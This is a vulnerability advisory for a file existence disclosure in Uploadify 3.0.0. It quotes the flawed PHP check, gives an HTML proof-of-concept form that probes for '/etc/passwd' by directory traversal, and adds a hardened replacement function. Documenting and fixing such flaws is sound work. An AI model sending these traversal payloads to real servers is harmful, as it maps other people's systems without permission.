File Existence Disclosure in Uploadify 3.0.0

I. DESCRIPTION

Uploadify is a jQuery plugin that integrates a fully customizable multiple file upload utility on your website. It uses a mixture of JavaScript, ActionScript, and any server-side language to dynamically create an instance over any DOM element on a page. http://www.uploadify.com/

—————————————

II. TESTED VERSION

Uploadify version 3.0.0 is affected.

—————————————

III. EXPLOIT

1. File Existence Disclosure vulnerability in "uploadify-check-exists.php"

Reason: missing input data validation

Attack vector: user-submitted POST parameter "filename"

Preconditions: none

Result: attacker can reveal the existence of files and directories on the remote system

Source code snippet from the script "uploadify-check-exists.php":

—————–[ source code start ]———————————

// $_POST['filename'] is appended to the uploads path without any validation
if (file_exists($_SERVER['DOCUMENT_ROOT'] . '/uploads/' . $_POST['filename'])) {
    echo 1;
} else {
    echo 0;
}

—————–[ source code end ]———————————–

We can see that the user-submitted POST parameter "filename" is used in the argument to the PHP function "file_exists()". There is no input data validation, so an attacker can use directory traversal to reveal the existence of arbitrary files and directories on the affected system.

Test:

—————–[ PoC code start ]———————————–

<html><body><center>
<form action="http://localhost/uploadify-v3.0.0/uploadify-check-exists.php" method="post">
<input type="hidden" name="filename" value="../../../../../../../../etc/passwd">
<input type="submit" value="Test">
</form>
</center></body></html>

—————–[ PoC code end ]———————————–
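
A hardened form of the check shown above, as an added example (not Uploadify's code and not part of the original advisory). The helper name upload_exists, the assumption that the uploads directory is flat (no subdirectories), and the CLI demo inputs are constructed for illustration.

```php
<?php
// Added example: hardened replacement for the file_exists() check.
// upload_exists() is a hypothetical helper, not part of Uploadify.
function upload_exists(string $uploadDir, $filename): bool
{
    // filename[]=x arrives as an array; only non-empty strings are valid.
    if (!is_string($filename) || $filename === '') {
        return false;
    }
    // A bare file name has no separators or NUL bytes and is not "." or "..".
    if (strpbrk($filename, "/\\\0") !== false || $filename === '.' || $filename === '..') {
        return false;
    }
    $base = realpath($uploadDir);
    if ($base === false) {
        return false;
    }
    // realpath() resolves symlinks and returns false for a missing file.
    $target = realpath($base . DIRECTORY_SEPARATOR . $filename);
    if ($target === false) {
        return false;
    }
    // Answer only for regular files located directly inside the uploads directory.
    return dirname($target) === $base && is_file($target);
}

if (PHP_SAPI === 'cli') {
    // Constructed demo: temporary uploads directory holding one file.
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'uploads_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . DIRECTORY_SEPARATOR . 'report.pdf', 'x');
    $inputs = ['report.pdf', 'missing.txt', '../../../../etc/passwd', '..', ['a']];
    foreach ($inputs as $in) {
        printf("%-28s => %d\n", json_encode($in), upload_exists($dir, $in));
    }
    unlink($dir . DIRECTORY_SEPARATOR . 'report.pdf');
    rmdir($dir);
} else {
    // Web request: same 1/0 response format as the original script.
    echo upload_exists($_SERVER['DOCUMENT_ROOT'] . '/uploads', $_POST['filename'] ?? null) ? 1 : 0;
}
```

The separator check rejects traversal sequences before any filesystem call, and the dirname() comparison after realpath() also covers a symlink inside the uploads directory that points elsewhere.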

—————————————

V. REFERENCES

Author: Janek Vind « waraxe »
Date: 05. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-82.html